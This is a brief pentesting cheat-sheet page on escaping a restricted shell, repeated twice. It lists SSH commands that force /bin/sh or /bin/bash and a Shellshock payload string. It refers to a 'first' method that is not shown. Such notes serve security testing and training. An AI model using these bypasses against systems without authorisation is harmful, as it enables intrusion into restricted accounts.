Restricted Shell
Restricted shell
There is other methods available if that first one fails:
ssh username@IP -t “/bin/sh” or “/bin/bash”
ssh username@IP -t “() { :; }; /bin/bash” (Shellshock)
Last updated
Was this helpful?
There is other methods available if that first one fails:
ssh username@IP -t “/bin/sh” or “/bin/bash”
ssh username@IP -t “() { :; }; /bin/bash” (Shellshock)
Last updated
Was this helpful?